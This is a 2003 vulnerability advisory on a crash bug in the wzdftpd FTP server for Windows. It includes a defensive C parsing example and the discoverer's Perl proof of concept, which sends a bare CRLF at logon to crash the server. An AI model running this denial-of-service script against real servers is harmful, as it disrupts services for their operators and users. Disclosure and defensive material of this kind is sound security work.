Denial of Service in WZDftpD FTP Server for Windows

A vulnerability in WZDftpD's wzdftpd FTP Server for Windows can result in a Denial of Service (DoS) condition.

Ken Pfeil

September 25, 2003


Reported September 23, 2003 by Moran Zavdi.

 

 

VERSIONS AFFECTED

 

WZDftpD's wzdftpd FTP Server for Windows

 

DESCRIPTION

 

A vulnerability in WZDftpD's wzdftpd FTP Server for Windows can result in a Denial of Service (DoS) condition. Sending a CRLF sequence at logon causes an unhandled exception at the server.
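One way a server's command reader can treat the bare CRLF described above as an empty line instead of passing it to the command dispatcher. This is an added example, not wzdftpd's code or its patch; the page does not describe the server's parser, and the function names, return codes and the USER/PASS/QUIT pre-login allow-list are assumptions of this example.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

/* Added example: every name below is hypothetical, none is wzdftpd's. */
enum ftp_parse { FTP_OK, FTP_EMPTY, FTP_BAD };
#define VERB_MAX 4 /* RFC 959 command verbs are 3 or 4 letters */

/* Split one control-channel line (len raw bytes, CRLF optional) into an
 * upper-cased verb plus argument pointer/length. Reads only line[0..len-1],
 * never writes to it; verb holds VERB_MAX + 1 bytes, valid only on FTP_OK. */
enum ftp_parse parse_ftp_line(const char *line, size_t len, char *verb,
                              const char **arg, size_t *arg_len)
{
    size_t i = 0, v = 0;
    verb[0] = '\0'; *arg = ""; *arg_len = 0;
    if (line == NULL || memchr(line, '\0', len) != NULL)
        return FTP_BAD;                  /* no buffer or embedded NUL */
    while (len > 0 && (line[len - 1] == '\r' || line[len - 1] == '\n'))
        len--;                           /* drop the line terminator */
    while (i < len && line[i] == ' ') i++;
    if (i == len) return FTP_EMPTY;      /* bare CRLF: nothing to dispatch */
    for (; i < len && line[i] != ' '; i++) {
        if (v == VERB_MAX || !isalpha((unsigned char)line[i]))
            return FTP_BAD;              /* overlong or non-letter verb */
        verb[v++] = (char)toupper((unsigned char)line[i]);
        verb[v] = '\0';
    }
    while (i < len && line[i] == ' ') i++;
    *arg = line + i; *arg_len = len - i; /* argument is not NUL-terminated */
    return FTP_OK;
}

/* Assumed policy: before authentication only these verbs are dispatched. */
int allowed_before_login(const char *verb)
{
    return !strcmp(verb, "USER") || !strcmp(verb, "PASS") || !strcmp(verb, "QUIT");
}

int main(void)
{   /* Constructed sample lines; the first is the advisory's bare CRLF. */
    const char *s[] = { "\r\n", "user anonymous\r\n", "RETR x\r\n" };
    char verb[VERB_MAX + 1]; const char *arg; size_t n, k;
    for (k = 0; k < 3; k++) {
        enum ftp_parse r = parse_ftp_line(s[k], strlen(s[k]), verb, &arg, &n);
        printf("%d [%s] pre-login=%d\n", r, verb, r == FTP_OK && allowed_before_login(verb));
    }
    return 0;
}
```

A caller would ignore `FTP_EMPTY` and keep reading, and reply with a syntax error for `FTP_BAD`, so neither case reaches per-command handlers.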

 

DEMONSTRATION

 
The discoverer posted the following code as proof of concept:
 

#!/usr/bin/perl
#
#   ###############################
#   #     Proof of concept for         #
#   # WZDFTPD FTP Server version 0.1rc5 #
#   ###############################
#
# http://www.moozatech.com/mt-23-09-2003.txt
#
# Usage: perl mooza1.pl [host] [port]
use IO::Socket;

$host = $ARGV[0];
$port = $ARGV[1];

print "#####################################\n";
print "Proof-Of-Concept for wzdftpd v0.1rc5.\n";
print "this code is for demonstration only.\n";
print "Use it under your own responsebility.\n";
print "#####################################\n";

# Both arguments are required.
unless (defined $host && defined $port) {
  print "Oops, Something is missing.\n";
  die "Usage: perl mooza1.pl [host] [port]\n";
}

print "Connecting to $host:$port... ";

$socket = IO::Socket::INET->new(PeerAddr => $host, PeerPort => $port, Proto => "tcp", Type => SOCK_STREAM)
  or die "Failed, Cant connect?\n";
$socket->autoflush(1);

print "OK\n";
sleep 1;
print "Sending Dos..\n";
sleep 2;

# Send a bare CRLF at the logon prompt, the sequence named in the description above.
print $socket "\r\n";

sleep 2;
print "we are done here..\n";
close($socket);

 
 

VENDOR RESPONSE

 

WZDftpD has released a patch for this vulnerability.

 

CREDIT

Discovered by Moran Zavdi.
